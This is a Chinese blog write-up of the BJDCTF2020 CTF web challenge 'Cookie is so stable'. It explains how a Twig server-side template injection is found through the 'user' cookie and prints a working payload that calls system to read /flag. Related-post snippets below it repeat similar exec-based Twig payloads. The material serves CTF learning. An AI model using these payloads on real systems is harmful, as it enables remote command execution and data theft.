[BJDCTF2020]Cookie is so stable

最新推荐文章于 2024-06-13 07:36:50 发布
最新推荐文章于 2024-06-13 07:36:50 发布
阅读量1.6k 收藏
点赞数
分类专栏: ctf 文章标签: php 网络安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45751765/article/details/122721305
版权

1NDEX

一级目录

二级目录

三级目录

0x00 前言

本来想做做高分题,发现除了php外的语言基础太差了…惭愧
日常刷题
在这里插入图片描述
一个flag 一个hint
hint先扫一下发现提示
在这里插入图片描述
有个小坑 未在flag界面进行提交时会少一个cookie的键值
原先的两个其实并无作用
在这里插入图片描述
ID框进行test
输什么返回什么 第一反应模板注入

误区

不要认为SSTI只存在于python中
有模板的地方就有可能有SSTI

常见模板引擎
php

  • Smarty
  • Twig
  • Plates

java

  • JSP
  • FreeMarker
  • Velocity

python

  • Jinja2
  • django
  • tornado

0x01 brain.md

在这里插入图片描述
test一下可以发现时Twig
在这里插入图片描述
(不在cookie处注入,直接在ID框处注入较不正常)??多了些过滤
折腾一会儿才发现cookie里多了一个user
可用payload

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter('cat /flag')}}

在这里插入图片描述
附上师傅们的payloads

PHP模板注入
TWIG 全版本通用 SSTI payloads

参考

https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8BSSTI%E6%BC%8F%E6%B4%9E/#2-Twig
https://www.cnblogs.com/bmjoker/p/13508538.html

0x02 rethink

嗝 最近感觉健康生活是能促进自律的…

k_du1t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
获取cookie非常好用的google插件
06-10
标题中的“获取cookie非常好用的google插件”指的是在Google Chrome浏览器上的一种扩展程序,它允许用户方便地管理和操作浏览器中的Cookie数据。Cookie是网站在用户计算机上存储的小型文本文件,用于跟踪用户偏好、...
BJDCTF2020 Cookie is so stable
Tajang的大千世界
04-11 130
打开靶机 左点右点没啥头绪,看了wp说是ssti注入。那我们在flag页面输入{{4*4}}试一下。 的确存在ssti注入,但在flag页面payload不行,因为提示了cookiecookie里存储了值,在这个页面会被拦截。那就抓包改cookie吧。在F12也能改,但在我这貌似出了点问题,还是老老实实抓包吧。抓包后在cookie里加入 user:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat
[BJDCTF2020]Cookie is so stable1
最新发布
m0_73673698的博客
06-13 341
如果是Jinja2的话输出应该是输出22,为什么输出22呢,'2'在python中被看作是字符串,在python中一个字符串乘上一个数字,就是将这个字符串连续输出,看下面演示。这里是Twig1.x版本(但是怎么确定是1.x版本的我没有弄明白,因此下面的payload也只适用于Twig1.x版本)最终我们的payload为。提示看一下cookie,我们在flag.php页面抓包可以看到cookie中是存在一个user参数的。确定是ssti注入,那么接下来就是确定是哪个模板了,上图。打开题目,看到如下页面。
[BJDCTF2020]Cookie is so stable 模板注入SSTI
m0_64180167的博客
09-19 187
这个题目已经在提示我们了然后我们去hint看看让我们看看cookie 那我们肯定直接抓包啊cookie中存在 回显值 但是我觉得一眼看上去就不是sql注入 因为是我们提交东西 而且没有查询的东西所以我们可以想到是不是其他注入 于是就思考到是不是模板注入。
web buuctf [BJDCTF2020]Cookie is so stable
weixin_44214568的博客
03-31 514
1. 2.查看hint页面源代码,提示关键在cookie 3.用admin登录,之后刷新抓包,发现cookie: UM_distinctid=17df970999f4d4-04704e6be3f571-4c3e207f-e1000-17df97099a05d4; PHPSESSID=c8ca1d92349dffef8879d35029b3eeb0; user=admin 第一个是友盟的,主要看cookie中的user 4.cookie中的注入,我第一个想法就是ssti(模板注入) paylo
BUUCTF [BJDCTF2020] Cookie is so stable
Senimo
01-03 443
BUUCTF [BJDCTF2020] Cookie is so stable 考点: Twig模版注入 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} 首先启动环境: 其中导航栏包括Flag和Hint页面,依次点击查看,首先是Hint页面: 查看网页源码,得到: <h3>Welcome to BJDCTF 2020.Happy Game!</h3>
【BUUCTF】[BJDCTF2020]Cookie is so stable
aoao331198的博客
04-30 230
flag页面比较容易看出来存在SSTI 看见有wp说是Twig模板注入,copy一下判断方法 尝试{{7*7}}, 返回49 尝试{{7*‘7’}},返回49,说明是Twig模板,但是如果返回7777777,则说明是Jinia2模板 不同的模板的攻击方式不同,贴一个好文章 一篇文章带你理解漏洞之 SSTI 漏洞 用PL {{_self.env.registerUndefinedFilterCallback("exec")}} {{_self.env.getFilter("id")}} 但是在输入框.
[BJDCTF2020]Cookie is so stable(漏洞原理详解)
pakho_C的博客
04-18 3256
web第45题 [BJDCTF2020]Cookie is so stable 打开靶场 访问flag页面 一个输入框 访问hint页面,查看源码 提示与cookie有关 那么在flag页面输入后抓包观察 输入后显示 登陆后抓包显示为 做到这里又遇到新的知识点了,模板注入漏洞 参考大佬的博客:一篇文章带你理解漏洞之 SSTI 漏洞,讲的非常详细 漏洞原理: SSTI 怎么产生的 服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解)
小宇的web博客
02-18 2522
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解) 先看一下题目 有首页,有flag页面,有Hint页面 这里题目有提示,突破口是在cookie上面 这里先进行抓包分析 这里的知识点是利用服务端模板注入攻击。SSTI里面的Twig攻击 这里有判断模板注入类型的办法 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 这里在cookie处进行判断 user={{7*‘7’}},查看返回值
[BJDCTF2020]Cookie is so stable(ssti模板注入从0到1学习笔记)
姜小孩的博客
03-31 1710
ssti模板注入从0到1 [BJDCTF2020]Cookie is so stable buu
IIS实现反向代理时Cookie域的设置方法
01-03
反向代理 神马是反向代理?指以代理服务器来接受Internet上的连接请求,然后将请求转发给内部网络上的服务器,并将从服务器上得到的结果返回给Internet上请求连接的客户端,此时代理...但是在多站点共享cookie时会存在
20210820cookie万能获取助手.rar
08-21
标题中的“20210820cookie万能获取助手.rar”暗示这是一款在2021年8月20日发布的工具,主要用于获取Web应用程序的Cookie信息。CookieWeb服务器存储在用户浏览器上的一小段数据,用于跟踪用户状态、个性化设置以及...
详解jQuery的Cookie插件
11-26
jQuery的Cookie插件是用于管理和操作浏览器Cookie的一种轻量级解决方案。主要由jQuery库扩展的$.cookie()函数实现。在JavaScript中,原生并不提供方便的API来处理Cookie,而jQuery.Cookie.js插件则简化了这一过程。 ...
EditThisCookie1.6.3.crx
02-14
方式1. 直接安装EditThisCookie1.6.3.crx设置浏览器cookie; !! 如果1.方式不好用使用方式2 方式2.解压zip文件->chrome选择开发者模式->加载已解压的压缩程序->选择对应的压缩文件目录
cookie实现自动登入
10-10
在互联网应用中,实现用户自动登录功能通常会利用Cookie这一技术。Cookie是由服务器发送到用户的浏览器并存储在本地的一小块数据,它包含了用户的一些关键信息,如用户名、登录状态等,以便下次用户访问时,服务器能...
JD cookie一键获取脚本,基于JavaScript
04-24
jdcookie.js下载 JD cookie一键获取脚本,基于JavaScript jdcookie.js下载 JD cookie一键获取脚本,基于JavaScript jdcookie.js下载 JD cookie一键获取脚本,基于JavaScript jdcookie.js下载 JD cookie一键获取脚本...
Uncaught ReferenceError: cookie is not defined
01-25
Uncaught ReferenceError: cookie is not defined错误通常是因为在代码中使用了未定义的cookie变量。这可能是由于以下几个原因导致的: 1. 拼写错误:请确保你在代码中正确地拼写了cookie变量。检查是否有任何拼写...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值